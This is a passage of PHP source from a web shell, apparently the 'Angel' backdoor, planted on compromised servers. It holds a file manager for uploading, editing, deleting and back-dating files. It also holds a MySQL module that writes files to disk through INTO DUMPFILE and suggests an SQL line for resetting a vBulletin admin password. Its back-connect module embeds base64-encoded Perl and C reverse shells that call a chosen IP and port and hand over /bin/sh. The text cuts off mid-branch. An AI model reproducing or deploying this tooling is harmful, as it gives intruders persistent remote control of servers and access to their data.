                    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>

                    <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>

                    <td nowrap><input class="bt" value="GO" type="submit"></td>

                </tr>

            </form>

        </table>

        <script type="text/javascript">

            function createdir(){

                var newdirname;

                newdirname = prompt('Please input the directory name:', '');

                if (!newdirname) return;

                $('createdir').newdirname.value=newdirname;

                $('createdir').submit();

            }

            function fileperm(pfile){

                var newperm;

                newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');

                if (!newperm) return;

                $('fileperm').newperm.value=newperm;

                $('fileperm').pfile.value=pfile;

                $('fileperm').submit();

            }

            function copyfile(sname){

                var tofile;

                tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');

                if (!tofile) return;

                $('copyfile').tofile.value=tofile;

                $('copyfile').sname.value=sname;

                $('copyfile').submit();

            }

            function rename(oldname){

                var newfilename;

                newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');

                if (!newfilename) return;

                $('rename').newfilename.value=newfilename;

                $('rename').oldname.value=oldname;

                $('rename').submit();

            }

            function dofile(doing,thefile,m){

                if (m && !confirm(m)) {

                    return;

                }

                $('filelist').doing.value=doing;

                if (thefile){

                    $('filelist').thefile.value=thefile;

                }

                $('filelist').submit();

            }

            function createfile(nowpath){

                var filename;

                filename = prompt('Please input the file name:', '');

                if (!filename) return;

                opfile('editfile',nowpath + filename,nowpath);

            }

            function opfile(action,opfile,dir){

                $('fileopform').action.value=action;

                $('fileopform').opfile.value=opfile;

                $('fileopform').dir.value=dir;

                $('fileopform').submit();

            }

            function godir(dir,view_writable){

                if (view_writable) {

                    $('godir').view_writable.value=1;

                }

                $('godir').dir.value=dir;

                $('godir').submit();

            }

        </script>

    <?php

    tbhead();

    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');

    p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');

    p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');

    if ($view_writable) {

        p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');

    } else {

        p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');

    }

    p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');

    if (IS_WIN && IS_COM) {

        $obj = new COM("scripting.filesystemobject");

        if ($obj && is_object($obj)) {

            $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');

            foreach($obj->Drives as $drive) {

                if ($drive->DriveType == 2) {

                    p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');

                } else {

                    p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');

                }

            }

        }

    }



    p('</td></tr></form>');



    p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');





    $dirdata=array();

    $filedata=array();



    if ($view_writable) {

        $dirdata = GetList($nowpath);

    } else {



        $dirs=@opendir($dir);

        while ($file=@readdir($dirs)) {

            $filepath=$nowpath.$file;

            if(@is_dir($filepath)){

                $dirdb['filename']=$file;

                $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));

                $dirdb['dirchmod']=getChmod($filepath);

                $dirdb['dirperm']=getPerms($filepath);

                $dirdb['fileowner']=getUser($filepath);

                $dirdb['dirlink']=$nowpath;

                $dirdb['server_link']=$filepath;

                $dirdb['client_link']=ue($filepath);

                $dirdata[]=$dirdb;

            } else {

                $filedb['filename']=$file;

                $filedb['size']=sizecount(@filesize($filepath));

                $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));

                $filedb['filechmod']=getChmod($filepath);

                $filedb['fileperm']=getPerms($filepath);

                $filedb['fileowner']=getUser($filepath);

                $filedb['dirlink']=$nowpath;

                $filedb['server_link']=$filepath;

                $filedb['client_link']=ue($filepath);

                $filedata[]=$filedb;

            }

        }

        unset($dirdb);

        unset($filedb);

        @closedir($dirs);

    }

    @sort($dirdata);

    @sort($filedata);

    $dir_i = '0';

    foreach($dirdata as $key => $dirdb){

        if($dirdb['filename']!='..' && $dirdb['filename']!='.') {

            $thisbg = bg();

            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');

            p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');

            p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');

            p('<td nowrap>'.$dirdb['mtime'].'</td>');

            p('<td nowrap>--</td>');

            p('<td nowrap>');

            p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');

            p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');

            p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');

            p('</tr>');

            $dir_i++;

        } else {

            if($dirdb['filename']=='..') {

                p('<tr class=fout>');

                p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');

                p('</tr>');

            }

        }

    }



    p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');

    p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');

    makehide('action','file');

    makehide('thefile');

    makehide('doing');

    makehide('dir',$nowpath);

    $file_i = '0';

    foreach($filedata as $key => $filedb){

        if($filedb['filename']!='..' && $filedb['filename']!='.') {

            $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);

            $thisbg = bg();

            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');

            p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');

            p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');

            p('<td nowrap>'.$filedb['mtime'].'</td>');

            p('<td nowrap>'.$filedb['size'].'</td>');

            p('<td nowrap>');

            p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');

            p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');

            p('<td nowrap>');

            p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');

            p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');

            p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');

            p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');

            p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');

            p('</td></tr>');

            $file_i++;

        }

    }

    p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');

    p('</form></table>');

    }



    elseif ($action == 'sqlfile') {

    if($doing=="mysqlupload"){

        $file = $_FILES['uploadfile'];

        $filename = $file['tmp_name'];

        if (file_exists($savepath)) {

            m('The goal file has already existed');

        } else {

            if(!$filename) {

                m('Please choose a file');

            } else {

                $fp=@fopen($filename,'r');

                $contents=@fread($fp, filesize($filename));

                @fclose($fp);

                $contents = bin2hex($contents);

                if(!$upname) $upname = $file['name'];

                dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

                $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");

                m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());

            }

        }

    }

    ?>

        <script type="text/javascript">

            function mysqlfile(doing){

                if(!doing) return;

                $('doing').value=doing;

                $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;

                $('mysqlfile').dbport.value=$('dbinfo').dbport.value;

                $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;

                $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;

                $('mysqlfile').dbname.value=$('dbinfo').dbname.value;

                $('mysqlfile').charset.value=$('dbinfo').charset.value;

                $('mysqlfile').submit();

            }

        </script>

    <?php

    !$dbhost && $dbhost = 'localhost';

    !$dbuser && $dbuser = 'root';

    !$dbport && $dbport = '3306';

    $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');

    formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));

    makehide('action','sqlfile');

    p('<p>');

    p('DBHost:');

    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));

    p(':');

    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));

    p('DBUser:');

    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));

    p('DBPass:');

    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));

    p('DBName:');

    makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));

    p('DBCharset:');

    makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));

    p('</p>');

    formfoot();

    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');

    p('<h2>Upload file</h2>');

    p('<p><b>This operation the DB user must has FILE privilege</b></p>');

    p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');

    p('<h2>Download file</h2>');

    p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');

    makehide('dbhost');

    makehide('dbport');

    makehide('dbuser');

    makehide('dbpass');

    makehide('dbname');

    makehide('charset');

    makehide('doing');

    makehide('action','sqlfile');

    p('</form>');

    }



    elseif ($action == 'sqladmin') {

    !$dbhost && $dbhost = 'localhost';

    !$dbuser && $dbuser = 'root';

    !$dbport && $dbport = '3306';

    $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';

    if(isset($dbhost)){

        $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";

    }

    if(isset($dbuser)) {

        $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";

    }

    if(isset($dbpass)) {

        $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";

    }

    if(isset($dbport)) {

        $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";

    }

    if(isset($dbname)) {

        $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";

    }

    if(isset($charset)) {

        $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";

    }



    if ($doing == 'backupmysql' && $saveasfile) {

        if (!$table) {

            m('Please choose the table');

        } else {

            dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

            $table = array_flip($table);

            $fp = @fopen($path,'w');

            if ($fp) {

                $result = q('SHOW tables');

                if (!$result) p('<h2>'.mysql_error().'</h2>');

                $mysqldata = '';

                while ($currow = mysql_fetch_array($result)) {

                    if (isset($table[$currow[0]])) {

                        sqldumptable($currow[0], $fp);

                    }

                }

                fclose($fp);

                $fileurl = str_replace(SA_ROOT,'',$path);

                m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');

                mysql_close();

            } else {

                m('Backup failed');

            }

        }

    }

    if ($insert && $insertsql) {

        $keystr = $valstr = $tmp = '';

        foreach($insertsql as $key => $val) {

            if ($val) {

                $keystr .= $tmp.$key;

                $valstr .= $tmp."'".addslashes($val)."'";

                $tmp = ',';

            }

        }

        if ($keystr && $valstr) {

            dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

            m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());

        }

    }

    if ($update && $insertsql && $base64) {

        $valstr = $tmp = '';

        foreach($insertsql as $key => $val) {

            $valstr .= $tmp.$key."='".addslashes($val)."'";

            $tmp = ',';

        }

        if ($valstr) {

            $where = base64_decode($base64);

            dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

            m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());

        }

    }

    if ($doing == 'del' && $base64) {

        $where = base64_decode($base64);

        $delete_sql = "DELETE FROM $tablename WHERE $where";

        dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

        m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());

    }



    if ($tablename && $doing == 'drop') {

        dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

        if (q("DROP TABLE $tablename")) {

            m('Drop table of success');

            $tablename = '';

        } else {

            m(mysql_error());

        }

    }



    $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');



    formhead(array('title'=>'MYSQL Manager'));

    makehide('action','sqladmin');

    p('<p>');

    p('DBHost:');

    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));

    p(':');

    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));

    p('DBUser:');

    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));

    p('DBPass:');

    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));

    p('DBCharset:');

    makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));

    makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));

    p('</p>');

    formfoot();

    ?>

        <script type="text/javascript">

            function editrecord(action, base64, tablename){

                if (action == 'del') {

                    if (!confirm('Is or isn\'t deletion record?')) return;

                }

                $('recordlist').doing.value=action;

                $('recordlist').base64.value=base64;

                $('recordlist').tablename.value=tablename;

                $('recordlist').submit();

            }

            function moddbname(dbname) {

                if(!dbname) return;

                $('setdbname').dbname.value=dbname;

                $('setdbname').submit();

            }

            function settable(tablename,doing,page) {

                if(!tablename) return;

                if (doing) {

                    $('settable').doing.value=doing;

                }

                if (page) {

                    $('settable').page.value=page;

                }

                $('settable').tablename.value=tablename;

                $('settable').submit();

            }

        </script>

        <?php



        formhead(array('name'=>'recordlist'));

        makehide('doing');

        makehide('action','sqladmin');

        makehide('base64');

        makehide('tablename');

        p($dbform);

        formfoot();





        formhead(array('name'=>'setdbname'));

        makehide('action','sqladmin');

        p($dbform);

        if (!$dbname) {

            makehide('dbname');

        }

        formfoot();





        formhead(array('name'=>'settable'));

        makehide('action','sqladmin');

        p($dbform);

        makehide('tablename');

        makehide('page',$page);

        makehide('doing');

        formfoot();



        $cachetables = array();

        $pagenum = 30;

        $page = intval($page);

        if($page) {

            $start_limit = ($page - 1) * $pagenum;

        } else {

            $start_limit = 0;

            $page = 1;

        }

        if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {

            dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);



            $mysqlver = mysql_get_server_info();

            p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');

            $highver = $mysqlver > '4.1' ? 1 : 0;





            $query = q("SHOW DATABASES");

            $dbs = array();

            $dbs[] = '-- Select a database --';

            while($db = mysql_fetch_array($query)) {

                $dbs[$db['Database']] = $db['Database'];

            }

            makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));

            $tabledb = array();

            if ($dbname) {

                p('<p>');

                p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');

                if ($tablename) {

                    p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');

                }

                p('</p>');

                mysql_select_db($dbname);



                $getnumsql = '';

                $runquery = 0;

                if ($sql_query) {

                    $runquery = 1;

                }

                $allowedit = 0;

                if ($tablename && !$sql_query) {

                    $sql_query = "SELECT * FROM $tablename";

                    $getnumsql = $sql_query;

                    $sql_query = $sql_query." LIMIT $start_limit, $pagenum";

                    $allowedit = 1;

                }

                p('<form action="'.$self.'" method="POST">');

                p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>

			</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');

                makehide('tablename', $tablename);

                makehide('action','sqladmin');

                p($dbform);

                p('</form>');

                if ($tablename || ($runquery && $sql_query)) {

                    if ($doing == 'structure') {

                        $result = q("SHOW COLUMNS FROM $tablename");

                        $rowdb = array();

                        while($row = mysql_fetch_array($result)) {

                            $rowdb[] = $row;

                        }

                        p('<table border="0" cellpadding="3" cellspacing="0">');

                        p('<tr class="head">');

                        p('<td>Field</td>');

                        p('<td>Type</td>');

                        p('<td>Null</td>');

                        p('<td>Key</td>');

                        p('<td>Default</td>');

                        p('<td>Extra</td>');

                        p('</tr>');

                        foreach ($rowdb as $row) {

                            $thisbg = bg();

                            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');

                            p('<td>'.$row['Field'].'</td>');

                            p('<td>'.$row['Type'].'</td>');

                            p('<td>'.$row['Null'].'&nbsp;</td>');

                            p('<td>'.$row['Key'].'&nbsp;</td>');

                            p('<td>'.$row['Default'].'&nbsp;</td>');

                            p('<td>'.$row['Extra'].'&nbsp;</td>');

                            p('</tr>');

                        }

                        tbfoot();

                    } elseif ($doing == 'insert' || $doing == 'edit') {

                        $result = q('SHOW COLUMNS FROM '.$tablename);

                        while ($row = mysql_fetch_array($result)) {

                            $rowdb[] = $row;

                        }

                        $rs = array();

                        if ($doing == 'insert') {

                            p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');

                        } else {

                            p('<h2>Update record in '.$tablename.' table &raquo;</h2>');

                            $where = base64_decode($base64);

                            $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");

                            $rs = mysql_fetch_array($result);

                        }

                        p('<form method="post" action="'.$self.'">');

                        p($dbform);

                        makehide('action','sqladmin');

                        makehide('tablename',$tablename);

                        p('<table border="0" cellpadding="3" cellspacing="0">');

                        foreach ($rowdb as $row) {

                            if ($rs[$row['Field']]) {

                                $value = htmlspecialchars($rs[$row['Field']]);

                            } else {

                                $value = '';

                            }

                            $thisbg = bg();

                            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');

                            p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');

                        }

                        if ($doing == 'insert') {

                            p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');

                        } else {

                            p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');

                            makehide('base64', $base64);

                        }

                        p('</table></form>');

                    } else {

                        $querys = @explode(';',$sql_query);

                        foreach($querys as $num=>$query) {

                            if ($query) {

                                p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");

                                switch(qy($query))

                                {

                                    case 0:

                                        p('<h2>Error : '.mysql_error().'</h2>');

                                        break;

                                    case 1:

                                        if (strtolower(substr($query,0,13)) == 'select * from') {

                                            $allowedit = 1;

                                        }

                                        if ($getnumsql) {

                                            $tatol = mysql_num_rows(q($getnumsql));

                                            $multipage = multi($tatol, $pagenum, $page, $tablename);

                                        }

                                        if (!$tablename) {

                                            $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));

                                            $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);

                                            preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);

                                            $tablename = $matches[1][0];

                                        }

                                        $result = q($query);

                                        p($multipage);

                                        p('<table border="0" cellpadding="3" cellspacing="0">');

                                        p('<tr class="head">');

                                        if ($allowedit) p('<td>Action</td>');

                                        $fieldnum = @mysql_num_fields($result);

                                        for($i=0;$i<$fieldnum;$i++){

                                            $name = @mysql_field_name($result, $i);

                                            $type = @mysql_field_type($result, $i);

                                            $len = @mysql_field_len($result, $i);

                                            p("<td nowrap>$name<br><span>$type($len)</span></td>");

                                        }

                                        p('</tr>');

                                        while($mn = @mysql_fetch_assoc($result)){

                                            $thisbg = bg();

                                            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');

                                            $where = $tmp = $b1 = '';

                                            foreach($mn as $key=>$inside){

                                                if ($inside) {

                                                    $where .= $tmp.$key."='".addslashes($inside)."'";

                                                    $tmp = ' AND ';

                                                }

                                                $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';

                                            }

                                            $where = base64_encode($where);

                                            if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');

                                            p($b1);

                                            p('</tr>');

                                            unset($b1);

                                        }

                                        tbfoot();

                                        p($multipage);

                                        break;

                                    case 2:

                                        $ar = mysql_affected_rows();

                                        p('<h2>affected rows : <b>'.$ar.'</b></h2>');

                                        break;

                                }

                            }

                        }

                    }

                } else {

                    $query = q("SHOW TABLE STATUS");

                    $table_num = $table_rows = $data_size = 0;

                    $tabledb = array();

                    while($table = mysql_fetch_array($query)) {

                        $data_size = $data_size + $table['Data_length'];

                        $table_rows = $table_rows + $table['Rows'];

                        $table['Data_length'] = sizecount($table['Data_length']);

                        $table_num++;

                        $tabledb[] = $table;

                    }

                    $data_size = sizecount($data_size);

                    unset($table);

                    p('<table border="0" cellpadding="0" cellspacing="0">');

                    p('<form action="'.$self.'" method="POST">');

                    makehide('action','sqladmin');

                    p($dbform);

                    p('<tr class="head">');

                    p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');

                    p('<td>Name</td>');

                    p('<td>Rows</td>');

                    p('<td>Data_length</td>');

                    p('<td>Create_time</td>');

                    p('<td>Update_time</td>');

                    if ($highver) {

                        p('<td>Engine</td>');

                        p('<td>Collation</td>');

                    }

                    p('</tr>');

                    foreach ($tabledb as $key => $table) {

                        $thisbg = bg();

                        p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');

                        p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');

                        p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');

                        p('<td>'.$table['Rows'].'</td>');

                        p('<td>'.$table['Data_length'].'</td>');

                        p('<td>'.$table['Create_time'].'</td>');

                        p('<td>'.$table['Update_time'].'</td>');

                        if ($highver) {

                            p('<td>'.$table['Engine'].'</td>');

                            p('<td>'.$table['Collation'].'</td>');

                        }

                        p('</tr>');

                    }

                    p('<tr class=fout>');

                    p('<td>&nbsp;</td>');

                    p('<td>Total tables: '.$table_num.'</td>');

                    p('<td>'.$table_rows.'</td>');

                    p('<td>'.$data_size.'</td>');

                    p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');

                    p('</tr>');



                    p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."sql.gz\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");

                    makehide('doing','backupmysql');

                    formfoot();

                    p("</table>");

                    fr($query);

                }

            }

        }

        tbfoot();

        @mysql_close();

    }





    elseif ($action == 'backconnect') {

        !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];

        !$yourport && $yourport = '12345';

        $usedb = array('perl'=>'perl','c'=>'c');



        $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

            "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

            "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

            "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

            "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

            "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

            "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

        $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".

            "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".

            "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".

            "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".

            "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".

            "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".

            "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".

            "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";



        if ($start && $yourip && $yourport && $use){

            if ($use == 'perl') {

                cf('/tmp/angel_bc',$back_connect);

                $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");

            } else {

